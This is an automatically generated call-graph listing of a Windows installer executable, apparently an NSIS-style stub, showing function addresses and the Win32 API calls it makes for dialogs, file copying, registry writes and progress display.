40667d FreeLibrary 4289->4290 4292 406656 4289->4292 4290->4292 4291->4289 4296 406716 4292->4296 4301 4066b1 lstrcmpW 4292->4301 4302 4066e2 CloseHandle 4292->4302 4303 406700 CloseHandle 4292->4303 4293->4289 4294 406516 4293->4294 4295 4064fa FreeLibrary GlobalFree 4293->4295 4294->4285 4297 406528 lstrcpyW OpenProcess 4294->4297 4299 40657b CloseHandle CharUpperW lstrcmpW 4294->4299 4295->4278 4298 40671b CloseHandle FreeLibrary 4296->4298 4297->4294 4297->4299 4300 406730 CloseHandle 4298->4300 4299->4289 4299->4294 4300->4298 4301->4292 4301->4300 4302->4292 4303->4288 4304->4275 4305->4279 4306 4044d1 4307 40450b 4306->4307 4308 40453e 4306->4308 4374 405cb0 GetDlgItemTextW 4307->4374 4309 40454b GetDlgItem GetAsyncKeyState 4308->4309 4313 4045dd 4308->4313 4311 40456a GetDlgItem 4309->4311 4324 404588 4309->4324 4316 403d6b 19 API calls 4311->4316 4312 4046c9 4372 40485f 4312->4372 4376 405cb0 GetDlgItemTextW 4312->4376 4313->4312 4321 406831 18 API calls 4313->4321 4313->4372 4314 404516 4315 406064 5 API calls 4314->4315 4317 40451c 4315->4317 4319 40457d ShowWindow 4316->4319 4320 403ea0 5 API calls 4317->4320 4319->4324 4325 404521 GetDlgItem 4320->4325 4326 40465b SHBrowseForFolderW 4321->4326 4322 4046f5 4327 4067aa 18 API calls 4322->4327 4323 403df6 8 API calls 4328 404873 4323->4328 4329 4045a5 SetWindowTextW 4324->4329 4333 405d85 4 API calls 4324->4333 4330 40452f IsDlgButtonChecked 4325->4330 4325->4372 4326->4312 4332 404673 CoTaskMemFree 4326->4332 4337 4046fb 4327->4337 4331 403d6b 19 API calls 4329->4331 4330->4308 4335 4045c3 4331->4335 4336 40674e 3 API calls 4332->4336 4334 40459b 4333->4334 4334->4329 4341 40674e 3 API calls 4334->4341 4338 403d6b 19 API calls 4335->4338 4339 404680 4336->4339 4377 406035 lstrcpynW 4337->4377 4342 4045ce 4338->4342 4343 4046b7 SetDlgItemTextW 4339->4343 4348 406831 18 API calls 4339->4348 4341->4329 4375 403dc4 SendMessageW 4342->4375 4343->4312 4344 404712 4346 406328 3 API calls 4344->4346 4355 40471a 4346->4355 4347 4045d6 4349 406328 3 API calls 4347->4349 4350 40469f lstrcmpiW 4348->4350 4349->4313 4350->4343 4353 4046b0 lstrcatW 4350->4353 4351 40475c 4378 406035 lstrcpynW 4351->4378 4353->4343 4354 404765 4356 405d85 4 API calls 4354->4356 4355->4351 4359 40677d 2 API calls 4355->4359 4361 4047b1 4355->4361 4357 40476b GetDiskFreeSpaceW 4356->4357 4360 40478f MulDiv 4357->4360 4357->4361 4359->4355 4360->4361 4362 40480e 4361->4362 4379 4043d9 4361->4379 4363 404831 4362->4363 4365 40141d 80 API calls 4362->4365 4387 403db1 KiUserCallbackDispatcher 4363->4387 4365->4363 4366 4047ff 4368 404810 SetDlgItemTextW 4366->4368 4369 404804 4366->4369 4368->4362 4371 4043d9 21 API calls 4369->4371 4370 40484d 4370->4372 4388 403d8d 4370->4388 4371->4362 4372->4323 4374->4314 4375->4347 4376->4322 4377->4344 4378->4354 4380 4043f9 4379->4380 4381 406831 18 API calls 4380->4381 4382 404439 4381->4382 4383 406831 18 API calls 4382->4383 4384 404444 4383->4384 4385 406831 18 API calls 4384->4385 4386 404454 lstrlenW wsprintfW SetDlgItemTextW 4385->4386 4386->4366 4387->4370 4389 403da0 SendMessageW 4388->4389 4390 403d9b 4388->4390 4389->4372 4390->4389 4391 401dd3 4392 401446 18 API calls 4391->4392 4393 401dda 4392->4393 4394 401446 18 API calls 4393->4394 4395 4018d3 4394->4395 4396 402e55 4397 40145c 18 API calls 4396->4397 4398 402e63 4397->4398 4399 402e79 4398->4399 4400 40145c 18 API calls 4398->4400 4401 405e5c 2 API calls 4399->4401 4400->4399 4402 402e7f 4401->4402 4426 405e7c GetFileAttributesW CreateFileW 4402->4426 4404 402e8c 4405 402f35 4404->4405 4406 402e98 GlobalAlloc 4404->4406 4409 4062cf 11 API calls 4405->4409 4407 402eb1 4406->4407 4408 402f2c CloseHandle 4406->4408 4427 403368 SetFilePointer 4407->4427 4408->4405 4411 402f45 4409->4411 4413 402f50 DeleteFileW 4411->4413 4414 402f63 4411->4414 4412 402eb7 4415 403336 ReadFile 4412->4415 4413->4414 4428 401435 4414->4428 4417 402ec0 GlobalAlloc 4415->4417 4418 402ed0 4417->4418 4419 402f04 WriteFile GlobalFree 4417->4419 4421 40337f 33 API calls 4418->4421 4420 40337f 33 API calls 4419->4420 4422 402f29 4420->4422 4425 402edd 4421->4425 4422->4408 4424 402efb GlobalFree 4424->4419 4425->4424 4426->4404 4427->4412 4429 404f9e 25 API calls 4428->4429 4430 401443 4429->4430 4431 401cd5 4432 401446 18 API calls 4431->4432 4433 401cdd 4432->4433 4434 401446 18 API calls 4433->4434 4435 401ce8 4434->4435 4436 40145c 18 API calls 4435->4436 4437 401cf1 4436->4437 4438 401d07 lstrlenW 4437->4438 4439 401d43 4437->4439 4440 401d11 4438->4440 4440->4439 4444 406035 lstrcpynW 4440->4444 4442 401d2c 4442->4439 4443 401d39 lstrlenW 4442->4443 4443->4439 4444->4442 4445 402cd7 4446 401446 18 API calls 4445->4446 4448 402c64 4446->4448 4447 402d17 ReadFile 4447->4448 4448->4445 4448->4447 4449 402d99 4448->4449 4450 402dd8 4451 4030e3 4450->4451 4452 402ddf 4450->4452 4453 402de5 FindClose 4452->4453 4453->4451 4454 401d5c 4455 40145c 18 API calls 4454->4455 4456 401d63 4455->4456 4457 40145c 18 API calls 4456->4457 4458 401d6c 4457->4458 4459 401d73 lstrcmpiW 4458->4459 4460 401d86 lstrcmpW 4458->4460 4461 401d79 4459->4461 4460->4461 4462 401c99 4460->4462 4461->4460 4461->4462 4463 4027e3 4464 4027e9 4463->4464 4465 4027f2 4464->4465 4466 402836 4464->4466 4479 401553 4465->4479 4467 40145c 18 API calls 4466->4467 4469 40283d 4467->4469 4471 4062cf 11 API calls 4469->4471 4470 4027f9 4472 40145c 18 API calls 4470->4472 4476 401a13 4470->4476 4473 40284d 4471->4473 4474 40280a RegDeleteValueW 4472->4474 4483 40149d RegOpenKeyExW 4473->4483 4475 4062cf 11 API calls 4474->4475 4478 40282a RegCloseKey 4475->4478 4478->4476 4480 401563 4479->4480 4481 40145c 18 API calls 4480->4481 4482 401589 RegOpenKeyExW 4481->4482 4482->4470 4486 4014c9 4483->4486 4491 401515 4483->4491 4484 4014ef RegEnumKeyW 4485 401501 RegCloseKey 4484->4485 4484->4486 4488 406328 3 API calls 4485->4488 4486->4484 4486->4485 4487 401526 RegCloseKey 4486->4487 4489 40149d 3 API calls 4486->4489 4487->4491 4490 401511 4488->4490 4489->4486 4490->4491 4492 401541 RegDeleteKeyW 4490->4492 4491->4476 4492->4491 4493 4040e4 4494 4040ff 4493->4494 4500 40422d 4493->4500 4496 40413a 4494->4496 4524 403ff6 WideCharToMultiByte 4494->4524 4495 404298 4497 40436a 4495->4497 4498 4042a2 GetDlgItem 4495->4498 4504 403d6b 19 API calls 4496->4504 4505 403df6 8 API calls 4497->4505 4501 40432b 4498->4501 4502 4042bc 4498->4502 4500->4495 4500->4497 4503 404267 GetDlgItem SendMessageW 4500->4503 4501->4497 4506 40433d 4501->4506 4502->4501 4510 4042e2 6 API calls 4502->4510 4529 403db1 KiUserCallbackDispatcher 4503->4529 4508 40417a 4504->4508 4509 404365 4505->4509 4511 404353 4506->4511 4512 404343 SendMessageW 4506->4512 4514 403d6b 19 API calls 4508->4514 4510->4501 4511->4509 4515 404359 SendMessageW 4511->4515 4512->4511 4513 404293 4516 403d8d SendMessageW 4513->4516 4517 404187 CheckDlgButton 4514->4517 4515->4509 4516->4495 4527 403db1 KiUserCallbackDispatcher 4517->4527 4519 4041a5 GetDlgItem 4528 403dc4 SendMessageW 4519->4528 4521 4041bb SendMessageW 4522 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4521->4522 4523 4041d8 GetSysColor 4521->4523 4522->4509 4523->4522 4525 404033 4524->4525 4526 404015 GlobalAlloc WideCharToMultiByte 4524->4526 4525->4496 4526->4525 4527->4519 4528->4521 4529->4513 4530 402ae4 4531 402aeb 4530->4531 4532 4030e3 4530->4532 4533 402af2 CloseHandle 4531->4533 4533->4532 4534 402065 4535 401446 18 API calls 4534->4535 4536 40206d 4535->4536 4537 401446 18 API calls 4536->4537 4538 402076 GetDlgItem 4537->4538 4539 4030dc 4538->4539 4540 4030e3 4539->4540 4542 405f7d wsprintfW 4539->4542 4542->4540 4543 402665 4544 40145c 18 API calls 4543->4544 4545 40266b 4544->4545 4546 40145c 18 API calls 4545->4546 4547 402674 4546->4547 4548 40145c 18 API calls 4547->4548 4549 40267d 4548->4549 4550 4062cf 11 API calls 4549->4550 4551 40268c 4550->4551 4552 406301 2 API calls 4551->4552 4553 402695 4552->4553 4554 4026a6 lstrlenW lstrlenW 4553->4554 4556 404f9e 25 API calls 4553->4556 4558 4030e3 4553->4558 4555 404f9e 25 API calls 4554->4555 4557 4026e8 SHFileOperationW 4555->4557 4556->4553 4557->4553 4557->4558 4559 401c69 4560 40145c 18 API calls 4559->4560 4561 401c70 4560->4561 4562 4062cf 11 API calls 4561->4562 4563 401c80 4562->4563 4564 405ccc MessageBoxIndirectW 4563->4564 4565 401a13 4564->4565 4566 402f6e 4567 402f72 4566->4567 4568 402fae 4566->4568 4570 4062cf 11 API calls 4567->4570 4569 40145c 18 API calls 4568->4569 4576 402f9d 4569->4576 4571 402f7d 4570->4571 4572 4062cf 11 API calls 4571->4572 4573 402f90 4572->4573 4574 402fa2 4573->4574 4575 402f98 4573->4575 4578 406113 9 API calls 4574->4578 4577 403ea0 5 API calls 4575->4577 4577->4576 4578->4576 4579 4023f0 4580 402403 4579->4580 4581 4024da 4579->4581 4582 40145c 18 API calls 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 40240a 4582->4584 4587 4024f1 4583->4587 4585 40145c 18 API calls 4584->4585 4586 402413 4585->4586 4588 402429 LoadLibraryExW 4586->4588 4589 40241b GetModuleHandleW 4586->4589 4590 4024ce 4588->4590 4591 40243e 4588->4591 4589->4588 4589->4591 4593 404f9e 25 API calls 4590->4593 4603 406391 GlobalAlloc WideCharToMultiByte 4591->4603 4593->4581 4594 402449 4595 40248c 4594->4595 4596 40244f 4594->4596 4597 404f9e 25 API calls 4595->4597 4598 401435 25 API calls 4596->4598 4601 40245f 4596->4601 4599 402496 4597->4599 4598->4601 4600 4062cf 11 API calls 4599->4600 4600->4601 4601->4587 4602 4024c0 FreeLibrary 4601->4602 4602->4587 4604 4063c9 GlobalFree 4603->4604 4605 4063bc GetProcAddress 4603->4605 4604->4594 4605->4604 3416 402175 3426 401446 3416->3426 3418 40217c 3419 401446 18 API calls 3418->3419 3420 402186 3419->3420 3421 402197 3420->3421 3424 4062cf 11 API calls 3420->3424 3422 4021aa EnableWindow 3421->3422 3423 40219f ShowWindow 3421->3423 3425 4030e3 3422->3425 3423->3425 3424->3421 3427 406831 18 API calls 3426->3427 3428 401455 3427->3428 3428->3418 4606 4048f8 4607 404906 4606->4607 4608 40491d 4606->4608 4609 40490c 4607->4609 4624 404986 4607->4624 4610 40492b IsWindowVisible 4608->4610 4616 404942 4608->4616 4611 403ddb SendMessageW 4609->4611 4613 404938 4610->4613 4610->4624 4614 404916 4611->4614 4612 40498c CallWindowProcW 4612->4614 4625 40487a SendMessageW 4613->4625 4616->4612 4630 406035 lstrcpynW 4616->4630 4618 404971 4631 405f7d wsprintfW 4618->4631 4620 404978 4621 40141d 80 API calls 4620->4621 4622 40497f 4621->4622 4632 406035 lstrcpynW 4622->4632 4624->4612 4626 4048d7 SendMessageW 4625->4626 4627 40489d GetMessagePos ScreenToClient SendMessageW 4625->4627 4629 4048cf 4626->4629 4628 4048d4 4627->4628 4627->4629 4628->4626 4629->4616 4630->4618 4631->4620 4632->4624 3721 4050f9 3722 4052c1 3721->3722 3723 40511a GetDlgItem GetDlgItem GetDlgItem 3721->3723 3724 4052f2 3722->3724 3725 4052ca GetDlgItem CreateThread CloseHandle 3722->3725 3770 403dc4 SendMessageW 3723->3770 3727 405320 3724->3727 3729 405342 3724->3729 3730 40530c ShowWindow ShowWindow 3724->3730 3725->3724 3773 405073 OleInitialize 3725->3773 3731 40537e 3727->3731 3733 405331 3727->3733 3734 405357 ShowWindow 3727->3734 3728 40518e 3740 406831 18 API calls 3728->3740 3735 403df6 8 API calls 3729->3735 3772 403dc4 SendMessageW 3730->3772 3731->3729 3736 405389 SendMessageW 3731->3736 3737 403d44 SendMessageW 3733->3737 3738 405377 3734->3738 3739 405369 3734->3739 3745 4052ba 3735->3745 3744 4053a2 CreatePopupMenu 3736->3744 3736->3745 3737->3729 3743 403d44 SendMessageW 3738->3743 3741 404f9e 25 API calls 3739->3741 3742 4051ad 3740->3742 3741->3738 3746 4062cf 11 API calls 3742->3746 3743->3731 3747 406831 18 API calls 3744->3747 3748 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3746->3748 3749 4053b2 AppendMenuW 3747->3749 3750 405203 SendMessageW SendMessageW 3748->3750 3751 40521f 3748->3751 3752 4053c5 GetWindowRect 3749->3752 3753 4053d8 3749->3753 3750->3751 3754 405232 3751->3754 3755 405224 SendMessageW 3751->3755 3756 4053df TrackPopupMenu 3752->3756 3753->3756 3757 403d6b 19 API calls 3754->3757 3755->3754 3756->3745 3758 4053fd 3756->3758 3759 405242 3757->3759 3760 405419 SendMessageW 3758->3760 3761 40524b ShowWindow 3759->3761 3762 40527f GetDlgItem SendMessageW 3759->3762 3760->3760 3763 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3760->3763 3764 405261 ShowWindow 3761->3764 3765 40526e 3761->3765 3762->3745 3766 4052a2 SendMessageW SendMessageW 3762->3766 3767 40545b SendMessageW 3763->3767 3764->3765 3771 403dc4 SendMessageW 3765->3771 3766->3745 3767->3767 3768 405486 GlobalUnlock SetClipboardData CloseClipboard 3767->3768 3768->3745 3770->3728 3771->3762 3772->3727 3774 403ddb SendMessageW 3773->3774 3778 405096 3774->3778 3775 403ddb SendMessageW 3776 4050d1 OleUninitialize 3775->3776 3777 4062cf 11 API calls 3777->3778 3778->3777 3779 40139d 80 API calls 3778->3779 3780 4050c1 3778->3780 3779->3778 3780->3775 4633 4020f9 GetDC GetDeviceCaps 4634 401446 18 API calls 4633->4634 4635 402116 MulDiv 4634->4635 4636 401446 18 API calls 4635->4636 4637 40212c 4636->4637 4638 406831 18 API calls 4637->4638 4639 402165 CreateFontIndirectW 4638->4639 4640 4030dc 4639->4640 4641 4030e3 4640->4641 4643 405f7d wsprintfW 4640->4643 4643->4641 4644 4024fb 4645 40145c 18 API calls 4644->4645 4646 402502 4645->4646 4647 40145c 18 API calls 4646->4647 4648 40250c 4647->4648 4649 40145c 18 API calls 4648->4649 4650 402515 4649->4650 4651 40145c 18 API calls 4650->4651 4652 40251f 4651->4652 4653 40145c 18 API calls 4652->4653 4654 402529 4653->4654 4655 40253d 4654->4655 4656 40145c 18 API calls 4654->4656 4657 4062cf 11 API calls 4655->4657 4656->4655 4658 40256a CoCreateInstance 4657->4658 4659 40258c 4658->4659 4660 4026fc 4662 402708 4660->4662 4663 401ee4 4660->4663 4661 406831 18 API calls 4661->4663 4663->4660 4663->4661 3807 4019fd 3808 40145c 18 API calls 3807->3808 3809 401a04 3808->3809 3812 405eab 3809->3812 3813 405eb8 GetTickCount GetTempFileNameW 3812->3813 3814 401a0b 3813->3814 3815 405eee 3813->3815 3815->3813 3815->3814 4664 4022fd 4665 40145c 18 API calls 4664->4665 4666 402304 GetFileVersionInfoSizeW 4665->4666 4667 4030e3 4666->4667 4668 40232b GlobalAlloc 4666->4668 4668->4667 4669 40233f GetFileVersionInfoW 4668->4669 4670 402350 VerQueryValueW 4669->4670 4671 402381 GlobalFree 4669->4671 4670->4671 4672 402369 4670->4672 4671->4667 4677 405f7d wsprintfW 4672->4677 4675 402375 4678 405f7d wsprintfW 4675->4678 4677->4675 4678->4671 4679 402afd 4680 40145c 18 API calls 4679->4680 4681 402b04 4680->4681 4686 405e7c GetFileAttributesW CreateFileW 4681->4686 4683 402b10 4684 4030e3 4683->4684 4687 405f7d wsprintfW 4683->4687 4686->4683 4687->4684 4688 4029ff 4689 401553 19 API calls 4688->4689 4690 402a09 4689->4690 4691 40145c 18 API calls 4690->4691 4692 402a12 4691->4692 4693 402a1f RegQueryValueExW 4692->4693 4697 401a13 4692->4697 4694 402a45 4693->4694 4695 402a3f 4693->4695 4696 4029e4 RegCloseKey 4694->4696 4694->4697 4695->4694 4699 405f7d wsprintfW 4695->4699 4696->4697 4699->4694 4700 401000 4701 401037 BeginPaint GetClientRect 4700->4701 4702 40100c DefWindowProcW 4700->4702 4704 4010fc 4701->4704 4705 401182 4702->4705 4706 401073 CreateBrushIndirect FillRect DeleteObject 4704->4706 4707 401105 4704->4707 4706->4704 4708 401170 EndPaint 4707->4708 4709 40110b CreateFontIndirectW 4707->4709 4708->4705 4709->4708 4710 40111b 6 API calls 4709->4710 4710->4708 4711 401f80 4712 401446 18 API calls 4711->4712 4713 401f88 4712->4713 4714 401446 18 API calls 4713->4714 4715 401f93 4714->4715 4716 401fa3 4715->4716 4717 40145c 18 API calls 4715->4717 4718 401fb3 4716->4718 4719 40145c 18 API calls 4716->4719 4717->4716 4720 402006 4718->4720 4721 401fbc 4718->4721 4719->4718 4722 40145c 18 API calls 4720->4722 4723 401446 18 API calls 4721->4723 4724 40200d 4722->4724 4725 401fc4 4723->4725 4727 40145c 18 API calls 4724->4727 4726 401446 18 API calls 4725->4726 4728 401fce 4726->4728 4729 402016 FindWindowExW 4727->4729 4730 401ff6 SendMessageW 4728->4730 4731 401fd8 SendMessageTimeoutW 4728->4731 4733 402036 4729->4733 4730->4733 4731->4733 4732 4030e3 4733->4732 4735 405f7d wsprintfW 4733->4735 4735->4732 4736 402880 4737 402884 4736->4737 4738 40145c 18 API calls 4737->4738 4739 4028a7 4738->4739 4740 40145c 18 API calls 4739->4740 4741 4028b1 4740->4741 4742 4028ba RegCreateKeyExW 4741->4742 4743 4028e8 4742->4743 4748 4029ef 4742->4748 4744 402934 4743->4744 4746 40145c 18 API calls 4743->4746 4745 402963 4744->4745 4747 401446 18 API calls 4744->4747 4749 4029ae RegSetValueExW 4745->4749 4752 40337f 33 API calls 4745->4752 4750 4028fc lstrlenW 4746->4750 4751 402947 4747->4751 4755 4029c6 RegCloseKey 4749->4755 4756 4029cb 4749->4756 4753 402918 4750->4753 4754 40292a 4750->4754 4758 4062cf 11 API calls 4751->4758 4759 40297b 4752->4759 4760 4062cf 11 API calls 4753->4760 4761 4062cf 11 API calls 4754->4761 4755->4748 4757 4062cf 11 API calls 4756->4757 4757->4755 4758->4745 4767 406250 4759->4767 4764 402922 4760->4764 4761->4744 4764->4749 4766 4062cf 11 API calls 4766->4764 4768 406273 4767->4768 4769 4062b6 4768->4769 4770 406288 wsprintfW 4768->4770 4771 402991 4769->4771 4772 4062bf lstrcatW 4769->4772 4770->4769 4770->4770 4771->4766 4772->4771 4773 403d02 4774 403d0d 4773->4774 4775 403d11 4774->4775 4776 403d14 GlobalAlloc 4774->4776 4776->4775 4777 402082 4778 401446 18 API calls 4777->4778 4779 402093 SetWindowLongW 4778->4779 4780 4030e3 4779->4780 4781 402a84 4782 401553 19 API calls 4781->4782 4783 402a8e 4782->4783 4784 401446 18 API calls 4783->4784 4785 402a98 4784->4785 4786 401a13 4785->4786 4787 402ab2 RegEnumKeyW 4785->4787 4788 402abe RegEnumValueW 4785->4788 4789 402a7e 4787->4789 4788->4786 4788->4789 4789->4786 4790 4029e4 RegCloseKey 4789->4790 4790->4786 4791 402c8a 4792 402ca2 4791->4792 4793 402c8f 4791->4793 4795 40145c 18 API calls 4792->4795 4794 401446 18 API calls 4793->4794 4797 402c97 4794->4797 4796 402ca9 lstrlenW 4795->4796 4796->4797 4798 401a13 4797->4798 4799 402ccb WriteFile 4797->4799 4799->4798 4800 401d8e 4801 40145c 18 API calls 4800->4801 4802 401d95 ExpandEnvironmentStringsW 4801->4802 4803 401da8 4802->4803 4804 401db9 4802->4804 4803->4804 4805 401dad lstrcmpW 4803->4805 4805->4804 4806 401e0f 4807 401446 18 API calls 4806->4807 4808 401e17 4807->4808 4809 401446 18 API calls 4808->4809 4810 401e21 4809->4810 4811 4030e3 4810->4811 4813 405f7d wsprintfW 4810->4813 4813->4811 4814 40438f 4815 4043c8 4814->4815 4816 40439f 4814->4816 4817 403df6 8 API calls 4815->4817 4818 403d6b 19 API calls 4816->4818 4820 4043d4 4817->4820 4819 4043ac SetDlgItemTextW 4818->4819 4819->4815 4821 403f90 4822 403fa0 4821->4822 4823 403fbc 4821->4823 4832 405cb0 GetDlgItemTextW 4822->4832 4825 403fc2 SHGetPathFromIDListW 4823->4825 4826 403fef 4823->4826 4828 403fd2 4825->4828 4831 403fd9 SendMessageW 4825->4831 4827 403fad SendMessageW 4827->4823 4829 40141d 80 API calls 4828->4829 4829->4831 4831->4826 4832->4827 4833 402392 4834 40145c 18 API calls 4833->4834 4835 402399 4834->4835 4838 407224 4835->4838 4839 406efe 25 API calls 4838->4839 4840 407244 4839->4840 4841 4023a7 4840->4841 4842 40724e lstrcpynW lstrcmpW 4840->4842 4843 407280 4842->4843 4844 407286 lstrcpynW 4842->4844 4843->4844 4844->4841 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3402 406113 3360->3402 3379 40683e 3363->3379 3364 406aab 3365 401488 3364->3365 3397 406035 lstrcpynW 3364->3397 3365->3358 3381 406064 3365->3381 3367 4068ff GetVersion 3367->3379 3368 406a72 lstrlenW 3368->3379 3370 406831 10 API calls 3370->3368 3373 40697e GetSystemDirectoryW 3373->3379 3374 406064 5 API calls 3374->3379 3375 406991 GetWindowsDirectoryW 3375->3379 3376 406831 10 API calls 3376->3379 3377 406a0b lstrcatW 3377->3379 3378 4069c5 SHGetSpecialFolderLocation 3378->3379 3380 4069dd SHGetPathFromIDListW CoTaskMemFree 3378->3380 3379->3364 3379->3367 3379->3368 3379->3370 3379->3373 3379->3374 3379->3375 3379->3376 3379->3377 3379->3378 3390 405eff RegOpenKeyExW 3379->3390 3395 405f7d wsprintfW 3379->3395 3396 406035 lstrcpynW 3379->3396 3380->3379 3388 406071 3381->3388 3382 4060e7 3383 4060ed CharPrevW 3382->3383 3385 40610d 3382->3385 3383->3382 3384 4060da CharNextW 3384->3382 3384->3388 3385->3358 3387 4060c6 CharNextW 3387->3388 3388->3382 3388->3384 3388->3387 3389 4060d5 CharNextW 3388->3389 3398 405d32 3388->3398 3389->3384 3391 405f33 RegQueryValueExW 3390->3391 3392 405f78 3390->3392 3393 405f55 RegCloseKey 3391->3393 3392->3379 3393->3392 3395->3379 3396->3379 3397->3365 3399 405d38 3398->3399 3400 405d4e 3399->3400 3401 405d3f CharNextW 3399->3401 3400->3388 3401->3399 3403 40613c 3402->3403 3404 40611f 3402->3404 3406 4061b3 3403->3406 3407 406159 3403->3407 3408 40277f WritePrivateProfileStringW 3403->3408 3405 406129 CloseHandle 3404->3405 3404->3408 3405->3408 3406->3408 3409 4061bc lstrcatW lstrlenW WriteFile 3406->3409 3407->3409 3410 406162 GetFileAttributesW 3407->3410 3409->3408 3415 405e7c GetFileAttributesW CreateFileW 3410->3415 3412 40617e 3412->3408 3413 4061a8 SetFilePointer 3412->3413 3414 40618e WriteFile 3412->3414 3413->3406 3414->3413 3415->3412 4845 402797 4846 40145c 18 API calls 4845->4846 4847 4027ae 4846->4847 4848 40145c 18 API calls 4847->4848 4849 4027b7 4848->4849 4850 40145c 18 API calls 4849->4850 4851 4027c0 GetPrivateProfileStringW lstrcmpW 4850->4851 4852 401e9a 4853 40145c 18 API calls 4852->4853 4854 401ea1 4853->4854 4855 401446 18 API calls 4854->4855 4856 401eab wsprintfW 4855->4856 3816 401a1f 3817 40145c 18 API calls 3816->3817 3818 401a26 3817->3818 3819 4062cf 11 API calls 3818->3819 3820 401a49 3819->3820 3821 401a64 3820->3821 3822 401a5c 3820->3822 3891 406035 lstrcpynW 3821->3891 3890 406035 lstrcpynW 3822->3890 3825 401a6f 3892 40674e lstrlenW CharPrevW 3825->3892 3826 401a62 3829 406064 5 API calls 3826->3829 3860 401a81 3829->3860 3830 406301 2 API calls 3830->3860 3833 401a98 CompareFileTime 3833->3860 3834 401ba9 3835 404f9e 25 API calls 3834->3835 3837 401bb3 3835->3837 3836 401b5d 3838 404f9e 25 API calls 3836->3838 3869 40337f 3837->3869 3840 401b70 3838->3840 3844 4062cf 11 API calls 3840->3844 3842 406035 lstrcpynW 3842->3860 3843 4062cf 11 API calls 3845 401bda 3843->3845 3849 401b8b 3844->3849 3846 401be9 SetFileTime 3845->3846 3847 401bf8 CloseHandle 3845->3847 3846->3847 3847->3849 3850 401c09 3847->3850 3848 406831 18 API calls 3848->3860 3851 401c21 3850->3851 3852 401c0e 3850->3852 3853 406831 18 API calls 3851->3853 3854 406831 18 API calls 3852->3854 3855 401c29 3853->3855 3857 401c16 lstrcatW 3854->3857 3858 4062cf 11 API calls 3855->3858 3857->3855 3861 401c34 3858->3861 3859 401b50 3863 401b93 3859->3863 3864 401b53 3859->3864 3860->3830 3860->3833 3860->3834 3860->3836 3860->3842 3860->3848 3860->3859 3862 4062cf 11 API calls 3860->3862 3868 405e7c GetFileAttributesW CreateFileW 3860->3868 3895 405e5c GetFileAttributesW 3860->3895 3898 405ccc 3860->3898 3865 405ccc MessageBoxIndirectW 3861->3865 3862->3860 3866 4062cf 11 API calls 3863->3866 3867 4062cf 11 API calls 3864->3867 3865->3849 3866->3849 3867->3836 3868->3860 3870 40339a 3869->3870 3871 4033c7 3870->3871 3904 403368 SetFilePointer 3870->3904 3902 403336 ReadFile 3871->3902 3875 401bc6 3875->3843 3876 403546 3878 40354a 3876->3878 3879 40356e 3876->3879 3877 4033eb GetTickCount 3877->3875 3882 403438 3877->3882 3880 403336 ReadFile 3878->3880 3879->3875 3883 403336 ReadFile 3879->3883 3884 40358d WriteFile 3879->3884 3880->3875 3881 403336 ReadFile 3881->3882 3882->3875 3882->3881 3886 40348a GetTickCount 3882->3886 3887 4034af MulDiv wsprintfW 3882->3887 3889 4034f3 WriteFile 3882->3889 3883->3879 3884->3875 3885 4035a1 3884->3885 3885->3875 3885->3879 3886->3882 3888 404f9e 25 API calls 3887->3888 3888->3882 3889->3875 3889->3882 3890->3826 3891->3825 3893 401a75 lstrcatW 3892->3893 3894 40676b lstrcatW 3892->3894 3893->3826 3894->3893 3896 405e79 3895->3896 3897 405e6b SetFileAttributesW 3895->3897 3896->3860 3897->3896 3899 405ce1 3898->3899 3900 405d2f 3899->3900 3901 405cf7 MessageBoxIndirectW 3899->3901 3900->3860 3901->3900 3903 403357 3902->3903 3903->3875 3903->3876 3903->3877 3904->3871 4857 40209f GetDlgItem GetClientRect 4858 40145c 18 API calls 4857->4858 4859 4020cf LoadImageW SendMessageW 4858->4859 4860 4030e3 4859->4860 4861 4020ed DeleteObject 4859->4861 4861->4860 4862 402b9f 4863 401446 18 API calls 4862->4863 4867 402ba7 4863->4867 4864 402c4a 4865 402bdf ReadFile 4865->4867 4874 402c3d 4865->4874 4866 401446 18 API calls 4866->4874 4867->4864 4867->4865 4868 402c06 MultiByteToWideChar 4867->4868 4869 402c3f 4867->4869 4870 402c4f 4867->4870 4867->4874 4868->4867 4868->4870 4875 405f7d wsprintfW 4869->4875 4872 402c6b SetFilePointer 4870->4872 4870->4874 4872->4874 4873 402d17 ReadFile 4873->4874 4874->4864 4874->4866 4874->4873 4875->4864 4876 402b23 GlobalAlloc 4877 402b39 4876->4877 4878 402b4b 4876->4878 4879 401446 18 API calls 4877->4879 4880 40145c 18 API calls 4878->4880 4882 402b41 4879->4882 4881 402b52 WideCharToMultiByte lstrlenA 4880->4881 4881->4882 4883 402b84 WriteFile 4882->4883 4884 402b93 4882->4884 4883->4884 4885 402384 GlobalFree 4883->4885 4885->4884 4887 4040a3 4888 4040b0 lstrcpynW lstrlenW 4887->4888 4889 4040ad 4887->4889 4889->4888 3429 4054a5 3430 4055f9 3429->3430 3431 4054bd 3429->3431 3433 40564a 3430->3433 3434 40560a GetDlgItem GetDlgItem 3430->3434 3431->3430 3432 4054c9 3431->3432 3436 4054d4 SetWindowPos 3432->3436 3437 4054e7 3432->3437 3435 4056a4 3433->3435 3443 40139d 80 API calls 3433->3443 3438 403d6b 19 API calls 3434->3438 3444 4055f4 3435->3444 3499 403ddb 3435->3499 3436->3437 3440 405504 3437->3440 3441 4054ec ShowWindow 3437->3441 3442 405634 SetClassLongW 3438->3442 3445 405526 3440->3445 3446 40550c DestroyWindow 3440->3446 3441->3440 3447 40141d 80 API calls 3442->3447 3450 40567c 3443->3450 3448 40552b SetWindowLongW 3445->3448 3449 40553c 3445->3449 3451 405908 3446->3451 3447->3433 3448->3444 3452 4055e5 3449->3452 3453 405548 GetDlgItem 3449->3453 3450->3435 3454 405680 SendMessageW 3450->3454 3451->3444 3460 405939 ShowWindow 3451->3460 3519 403df6 3452->3519 3457 405578 3453->3457 3458 40555b SendMessageW IsWindowEnabled 3453->3458 3454->3444 3455 40141d 80 API calls 3468 4056b6 